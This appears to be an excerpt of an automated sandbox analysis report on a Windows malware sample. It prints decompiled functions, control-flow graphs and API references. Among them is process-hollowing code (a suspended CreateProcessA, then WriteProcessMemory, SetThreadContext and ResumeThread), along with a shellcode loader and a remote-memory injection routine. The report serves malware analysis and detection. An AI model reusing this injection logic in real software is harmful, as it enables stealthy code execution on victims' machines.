                                                                                control_flow_graph 386 e3003c-e30047 387 e30049 386->387 388 e3004c-e30263 call e30a3f call e30e0f call e30d90 VirtualAlloc 386->388 387->388 403 e30265-e30289 call e30a69 388->403 404 e3028b-e30292 388->404 408 e302ce-e303c2 VirtualProtect call e30cce call e30ce7 403->408 406 e302a1-e302b0 404->406 407 e302b2-e302cc 406->407 406->408 407->406 415 e303d1-e303e0 408->415 416 e303e2-e30437 call e30ce7 415->416 417 e30439-e304b8 VirtualFree 415->417 416->415 419 e305f4-e305fe 417->419 420 e304be-e304cd 417->420 421 e30604-e3060d 419->421 422 e3077f-e30789 419->422 424 e304d3-e304dd 420->424 421->422 425 e30613-e30637 421->425 427 e307a6-e307b0 422->427 428 e3078b-e307a3 422->428 424->419 429 e304e3-e30505 LoadLibraryA 424->429 434 e3063e-e30648 425->434 430 e307b6-e307cb 427->430 431 e3086e-e308be LoadLibraryA 427->431 428->427 432 e30517-e30520 429->432 433 e30507-e30515 429->433 435 e307d2-e307d5 430->435 442 e308c7-e308f9 431->442 436 e30526-e30547 432->436 433->436 434->422 437 e3064e-e3065a 434->437 438 e307d7-e307e0 435->438 439 e30824-e30833 435->439 440 e3054d-e30550 436->440 437->422 441 e30660-e3066a 437->441 443 e307e2 438->443 444 e307e4-e30822 438->444 448 e30839-e3083c 439->448 445 e305e0-e305ef 440->445 446 e30556-e3056b 440->446 447 e3067a-e30689 441->447 449 e30902-e3091d 442->449 450 e308fb-e30901 442->450 443->439 444->435 445->424 451 e3056f-e3057a 446->451 452 e3056d 446->452 453 e30750-e3077a 447->453 454 e3068f-e306b2 447->454 448->431 455 e3083e-e30847 448->455 450->449 457 e3059b-e305bb 451->457 458 e3057c-e30599 451->458 452->445 453->434 459 e306b4-e306ed 454->459 460 e306ef-e306fc 454->460 461 e3084b-e3086c 455->461 462 e30849 455->462 469 e305bd-e305db 457->469 458->469 459->460 463 e3074b 460->463 464 e306fe-e30748 460->464 461->448 462->431 463->447 464->463 469->440
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00E3024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: c2009aa6a2be5771bebaa03659693ae4346eb82dea4946fc49c5341671366fb5
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: 5E526874A01229DFDB64CF58C995BA8BBB1BF09304F1480E9E94DAB351DB30AE85DF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040977C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82threadinjectionprocessCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 470 40977c-4097b9 call 40ee2a CreateProcessA 473 4097c2-4097f3 call 40ee2a GetThreadContext 470->473 474 4097bb-4097bd 470->474 478 409801-40981c call 40637c 473->478 479 4097f5 473->479 475 409864-409866 474->475 480 4097f6-4097ff TerminateProcess 478->480 483 40981e-409839 WriteProcessMemory 478->483 479->480 480->474 483->479 484 40983b-409856 SetThreadContext 483->484 484->479 485 409858-409863 ResumeThread 484->485 485->475
                                                                                C-Code - Quality: 84%
                                                                                			E0040977C(void* __ecx, CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				void _v24;
				char _v28;
				struct _STARTUPINFOA _v96;
				struct _CONTEXT _v812;
				int _t26;
				int _t30;
				void* _t33;
				int _t39;
				int _t42;

				_t46 = __ecx;
				E0040EE2A(__ecx,  &_v96, 0, 0x44);
				_v96.cb = 0x44;
				_t26 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v96,  &_v20); // executed
				if(_t26 != 0) {
					E0040EE2A(_t46,  &_v812, 0, 0x2cc);
					_v812.ContextFlags = 0x10002;
					_t30 = GetThreadContext(_v20.hThread,  &_v812); // executed
					if(_t30 != 0) {
						_t33 = E0040637C(_entry_, _v20.hProcess,  &_v28,  &_v24); // executed
						_push(0);
						if(_t33 == 0) {
							L4:
							TerminateProcess(_v20.hProcess, ??);
							goto L1;
						}
						_t39 = WriteProcessMemory(_v20, _v812.Ebx + 8,  &_v24, 4, ??); // executed
						if(_t39 == 0) {
							goto L3;
						}
						_v812.Eax = _v28;
						_t42 = SetThreadContext(_v20.hThread,  &_v812); // executed
						if(_t42 == 0) {
							goto L3;
						}
						ResumeThread(_v20.hThread); // executed
						return 1;
					}
					L3:
					_push(0);
					goto L4;
				}
				L1:
				return 0;
			}













                                                                                0x0040977c
                                                                                0x0040978f
                                                                                0x004097a9
                                                                                0x004097b1
                                                                                0x004097b9
                                                                                0x004097cf
                                                                                0x004097e1
                                                                                0x004097eb
                                                                                0x004097f3
                                                                                0x00409811
                                                                                0x00409819
                                                                                0x0040981c
                                                                                0x004097f6
                                                                                0x004097f9
                                                                                0x00000000
                                                                                0x004097f9
                                                                                0x00409831
                                                                                0x00409839
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040983e
                                                                                0x0040984e
                                                                                0x00409856
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040985b
                                                                                0x00000000
                                                                                0x00409863
                                                                                0x004097f5
                                                                                0x004097f5
                                                                                0x00000000
                                                                                0x004097f5
                                                                                0x004097bb
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(00000000,00409947,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,004122F8), ref: 004097B1
                                                                                • GetThreadContext.KERNELBASE(?,?,?,?,?,?,?,004122F8), ref: 004097EB
                                                                                • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 004097F9
                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000,?,?,?,?,?,?,?,?,?,004122F8), ref: 00409831
                                                                                • SetThreadContext.KERNELBASE(?,00010002,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040984E
                                                                                • ResumeThread.KERNELBASE(?,?,?,?,?,?,?,?,?,?,004122F8), ref: 0040985B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                • String ID: D
                                                                                • API String ID: 2981417381-2746444292
                                                                                • Opcode ID: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
                                                                                • Instruction ID: 6dc29e085b1385aad622296cf5a9b119a202239bcf48ce0aeeb22bf7d7f748db
                                                                                • Opcode Fuzzy Hash: bfc8fb38e21afcc8978dd871529b03129cc6a272bb135abfd583736d5c6f917f
                                                                                • Instruction Fuzzy Hash: 54216DB2901119BBDB119FA1DC49EEF7B7CEF05750F004071B909F2191EB759A44CAA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404000 Relevance: 4.5, APIs: 3, Instructions: 35sleepfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 498 404000-404008 499 40400b-40402a CreateFileA 498->499 500 404057 499->500 501 40402c-404035 GetLastError 499->501 504 404059-40405c 500->504 502 404052 501->502 503 404037-40403a 501->503 506 404054-404056 502->506 503->502 505 40403c-40403f 503->505 504->506 505->504 507 404041-404050 Sleep 505->507 507->499 507->502
                                                                                C-Code - Quality: 100%
                                                                                			E00404000(CHAR* _a4, signed int* _a8) {
				void* _t3;
				long _t6;
				void* _t8;
				signed int* _t9;

				_t9 = _a8;
				_t8 = 0;
				 *_t9 =  *_t9 | 0xffffffff;
				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
					if(_t3 != 0xffffffff) {
						break;
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) {
						L6:
						return 0;
					} else {
						if(_t6 == 5) {
							L9:
							return 1;
						}
						Sleep(0x1f4);
						_t8 = _t8 + 1;
						if(_t8 < 0xa) {
							continue;
						}
						goto L6;
					}
				}
				 *_t9 = _t3;
				goto L9;
			}







                                                                                0x00404001
                                                                                0x00404006
                                                                                0x00404008
                                                                                0x0040400b
                                                                                0x00404021
                                                                                0x0040402a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040402c
                                                                                0x00404035
                                                                                0x00404052
                                                                                0x00000000
                                                                                0x0040403c
                                                                                0x0040403f
                                                                                0x00404059
                                                                                0x00000000
                                                                                0x0040405b
                                                                                0x00404046
                                                                                0x0040404c
                                                                                0x00404050
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404050
                                                                                0x00404035
                                                                                0x00404057
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,004122F8,004042B6,00000000,00000001,004122F8,00000000,?,004098FD), ref: 00404021
                                                                                • GetLastError.KERNEL32(?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 0040402C
                                                                                • Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404046
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateErrorFileLastSleep
                                                                                • String ID:
                                                                                • API String ID: 408151869-0
                                                                                • Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                • Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
                                                                                • Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                • Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040EC54 Relevance: 4.5, APIs: 3, Instructions: 24timeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 100%
                                                                                			E0040EC54() {
				long _v8;
				struct _FILETIME _v16;
				signed int _t11;

				GetSystemTimeAsFileTime( &_v16);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
				 *0x4136cc = _t11;
				return _t11;
			}






                                                                                0x0040ec5e
                                                                                0x0040ec72
                                                                                0x0040ec84
                                                                                0x0040ec89
                                                                                0x0040ec8f

                                                                                APIs
                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                • GetTickCount.KERNEL32 ref: 0040EC78
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$CountFileInformationSystemTickVolume
                                                                                • String ID:
                                                                                • API String ID: 1209300637-0
                                                                                • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406DC2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 526 406dc2-406dd5 527 406e33-406e35 526->527 528 406dd7-406df1 call 406cc9 call 40ef00 526->528 533 406df4-406df9 528->533 533->533 534 406dfb-406e00 533->534 535 406e02-406e22 GetVolumeInformationA 534->535 536 406e24 534->536 535->536 537 406e2e 535->537 536->537 537->527
                                                                                C-Code - Quality: 100%
                                                                                			E00406DC2(void* __ecx) {
				char _v261;
				char _v264;
				intOrPtr _t6;
				intOrPtr* _t10;
				int _t13;
				intOrPtr _t20;
				void* _t21;

				_t6 =  *0x412f0c; // 0x7d255ce3
				if(_t6 == 0) {
					E0040EF00( &_v264, E00406CC9(__ecx));
					_t10 =  &_v264;
					_t21 = _t10 + 1;
					do {
						_t20 =  *_t10;
						_t10 = _t10 + 1;
					} while (_t20 != 0);
					if(_t10 - _t21 < 3) {
						L5:
						 *0x412f0c = 0x61616161;
					} else {
						_v261 = 0;
						_t13 = GetVolumeInformationA( &_v264, 0, 0, "\xef\xbf\xbd\%}", 0, 0, 0, 0); // 						if(_t13 == 0) {
							goto L5;
						}
					}
					_t6 =  *0x412f0c; // 0x7d255ce3
				}
				return _t6;
			}










                                                                                0x00406dc5
                                                                                0x00406dd5
                                                                                0x00406de4
                                                                                0x00406dea
                                                                                0x00406df1
                                                                                0x00406df4
                                                                                0x00406df4
                                                                                0x00406df6
                                                                                0x00406df7
                                                                                0x00406e00
                                                                                0x00406e24
                                                                                0x00406e24
                                                                                0x00406e02
                                                                                0x00406e14
                                                                                0x00406e1a
                                                                                0x00406e22
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406e22
                                                                                0x00406e2e
                                                                                0x00406e2e
                                                                                0x00406e35

                                                                                APIs
                                                                                  • Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                  • Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                  • Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                  • Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,\%},00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
                                                                                • String ID: \%}
                                                                                • API String ID: 1823874839-2294156228
                                                                                • Opcode ID: 345ca179d3c76e57dc7c5b3e21092807213ae32d0ff3695f39e28a6e5ad22b42
                                                                                • Instruction ID: 46d685041afc82653286dae93d5fe3173771f16ecf38a4b71df535c97c95e6ed
                                                                                • Opcode Fuzzy Hash: 345ca179d3c76e57dc7c5b3e21092807213ae32d0ff3695f39e28a6e5ad22b42
                                                                                • Instruction Fuzzy Hash: 55F028B9104218AFD710DB68DDC5ED777ADD704308F008476E242E3141D6B89D984B5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406E36 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 538 406e36-406e5d GetUserNameW 539 406ebe-406ec2 538->539 540 406e5f-406e95 LookupAccountNameW 538->540 540->539 541 406e97-406e9b 540->541 542 406ebb-406ebd 541->542 543 406e9d-406ea3 541->543 542->539 543->542 544 406ea5-406eaa 543->544 545 406eb7-406eb9 544->545 546 406eac-406eb0 544->546 545->539 546->542 547 406eb2-406eb5 546->547 547->542 547->545
                                                                                C-Code - Quality: 100%
                                                                                			E00406E36(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				intOrPtr _v60;
				intOrPtr _v76;
				void _v84;
				short _v340;
				short _v860;
				int _t20;
				int _t28;
				intOrPtr _t30;
				signed int _t31;
				signed int _t32;

				_t32 = _t31 | 0xffffffff;
				_v8 = 0x104;
				_t20 = GetUserNameW( &_v860,  &_v8); // executed
				if(_t20 != 0) {
					_v8 = 0x7c;
					_v12 = 0x80;
					_t28 = LookupAccountNameW(0,  &_v860,  &_v84,  &_v8,  &_v340,  &_v12,  &_v16); // executed
					if(_t28 != 0) {
						if(_v8 < 0xc || _v76 != _a4) {
							L8:
							_t32 = 1;
						} else {
							_t30 = _a8;
							if(_t30 == 0 || _v8 >= 0x1c && _v60 == _t30) {
								_t32 = 0;
							} else {
								goto L8;
							}
						}
					}
				}
				return _t32;
			}
















                                                                                0x00406e4b
                                                                                0x00406e4e
                                                                                0x00406e55
                                                                                0x00406e5d
                                                                                0x00406e7f
                                                                                0x00406e86
                                                                                0x00406e8d
                                                                                0x00406e95
                                                                                0x00406e9b
                                                                                0x00406ebb
                                                                                0x00406ebd
                                                                                0x00406ea5
                                                                                0x00406ea5
                                                                                0x00406eaa
                                                                                0x00406eb7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406eaa
                                                                                0x00406e9b
                                                                                0x00406e95
                                                                                0x00406ec2

                                                                                APIs
                                                                                • GetUserNameW.ADVAPI32(?,00401FA1), ref: 00406E55
                                                                                • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,00000000,00000012), ref: 00406E8D
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountLookupUser
                                                                                • String ID:
                                                                                • API String ID: 2370142434-0
                                                                                • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                • Instruction ID: d69833bf2c7126fc9b7bd4b1d5117f4fe90a033eeaed535c4400ab00b2689cfd
                                                                                • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                • Instruction Fuzzy Hash: 0211F776900218EBDF21CFD4C884ADFB7BCAB04741F1542B6E502F6290DB749B989BE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E30E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 548 e30e0f-e30e24 SetErrorMode * 2 549 e30e26 548->549 550 e30e2b-e30e2c 548->550 549->550
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,00E30223,?,?), ref: 00E30E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,00E30223,?,?), ref: 00E30E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: e574d1152b94b3207e26eda2da96dc279aaa467c8c2ce42aca6242fe21b8d60c
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: 6FD0123124512877DB003A95DC0DBCD7F1CDF05B66F008411FB0DE9080C770994046E5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409892 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 551 409892-4098c0 552 4098c2-4098c5 551->552 553 4098d9 551->553 552->553 554 4098c7-4098d7 552->554 555 4098e0-4098f1 SetServiceStatus 553->555 554->555
                                                                                C-Code - Quality: 100%
                                                                                			E00409892(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t6;
				int _t7;
				signed int _t8;

				_t6 = _a4;
				 *0x413398 = _t6;
				 *0x41339c = 0 | _t6 != 0x00000002;
				 *0x4133a0 = _a8;
				 *0x4133ac = _a12;
				if(_t6 == 4 || _t6 == 1) {
					 *0x4133a8 =  *0x4133a8 & 0x00000000;
				} else {
					_t8 =  *0x41204c; // 0x2
					 *0x41204c =  *0x41204c + 1;
					 *0x4133a8 = _t8;
				}
				_t7 = SetServiceStatus( *0x413390, 0x413394); // executed
				return _t7;
			}






                                                                                0x00409892
                                                                                0x0040989e
                                                                                0x004098a3
                                                                                0x004098ad
                                                                                0x004098b7
                                                                                0x004098c0
                                                                                0x004098d9
                                                                                0x004098c7
                                                                                0x004098c7
                                                                                0x004098cc
                                                                                0x004098d2
                                                                                0x004098d2
                                                                                0x004098eb
                                                                                0x004098f1

                                                                                APIs
                                                                                • SetServiceStatus.SECHOST(00413394), ref: 004098EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ServiceStatus
                                                                                • String ID:
                                                                                • API String ID: 3969395364-0
                                                                                • Opcode ID: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
                                                                                • Instruction ID: dd676a4af3dd8f9e000b524091363a81fd6157f1888c947a943bd607f736cbf1
                                                                                • Opcode Fuzzy Hash: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
                                                                                • Instruction Fuzzy Hash: 02F0F271514208EFCB18CF14E89869A7BA0F348706B20C83EE82AD2371CB749A80DF0D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E30920 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 556 e30920-e30929 TerminateProcess
                                                                                APIs
                                                                                • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00E30929
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessTerminate
                                                                                • String ID:
                                                                                • API String ID: 560597551-0
                                                                                • Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                • Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
                                                                                • Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                • Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004098F2 Relevance: 1.3, APIs: 1, Instructions: 37sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 557 4098f2-4098f4 558 4098f6-409902 call 404280 557->558 561 409904-409913 Sleep 558->561 562 409917 558->562 561->558 563 409915 561->563 564 409919-409942 call 402544 call 40977c 562->564 565 40995e-409960 562->565 563->562 569 409947-409957 call 40ee2a 564->569 569->565
                                                                                C-Code - Quality: 88%
                                                                                			E004098F2(void* __ecx) {
				void* _t1;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t15;

				_t5 = __ecx;
				_t6 = 0;
				while(1) {
					_t1 = E00404280(_t5, 1); // executed
					_t7 = _t1;
					_pop(_t5);
					if(_t7 != 0) {
						break;
					}
					Sleep(0x3e8);
					_t6 = _t6 + 1;
					if(_t6 < 0xa) {
						continue;
					} else {
						_t15 = _t7;
					}
					break;
				}
				if(_t15 < 0) {
					_push(0);
					 *0x41201f = 1;
					E0040977C(_t5, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8)); // executed
					_t4 = E0040EE2A(_t5, 0x4122f8, 0, 0x100);
					 *0x41201f = 0;
					return _t4;
				}
				return _t1;
			}









                                                                                0x004098f2
                                                                                0x004098f4
                                                                                0x004098f6
                                                                                0x004098f8
                                                                                0x004098fd
                                                                                0x004098ff
                                                                                0x00409902
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409909
                                                                                0x0040990f
                                                                                0x00409913
                                                                                0x00000000
                                                                                0x00409915
                                                                                0x00409915
                                                                                0x00409915
                                                                                0x00000000
                                                                                0x00409913
                                                                                0x00409917
                                                                                0x00409919
                                                                                0x00409932
                                                                                0x00409942
                                                                                0x0040994f
                                                                                0x00409957
                                                                                0x00000000
                                                                                0x00409957
                                                                                0x00409960

                                                                                APIs
                                                                                  • Part of subcall function 00404280: CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
                                                                                • Sleep.KERNEL32(000003E8,00000100,004122F8,0040A3C7), ref: 00409909
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEventSleep
                                                                                • String ID:
                                                                                • API String ID: 3100162736-0
                                                                                • Opcode ID: 4d41be995d42169e7907864f945f5cc175d4e7c56b3013806251050fc082db50
                                                                                • Instruction ID: e56085e6bf9507d1b9c0d1fa6774ae3e34a200a1ca8b69066151cd7271dcc025
                                                                                • Opcode Fuzzy Hash: 4d41be995d42169e7907864f945f5cc175d4e7c56b3013806251050fc082db50
                                                                                • Instruction Fuzzy Hash: 58F05472A81360A6E62226566C07F8F19040B95B24F05417EF744BA2C395E8495141ED
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00E365E3 Relevance: 6.1, APIs: 4, Instructions: 67memoryinjectionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00E365F6
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00E36610
                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 00E36631
                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 00E36652
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual$HandleMemoryModuleProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 1965334864-0
                                                                                • Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                • Instruction ID: 7b03119296311c1e8bf78cd54d1105b94a1de8210c4c3bf9c3b3c19e411ce457
                                                                                • Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
                                                                                • Instruction Fuzzy Hash: 63115471600218BFDB115F75DC4AF9B3FA8EB057A9F118034FA05A7251D7B1DD00C6A4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

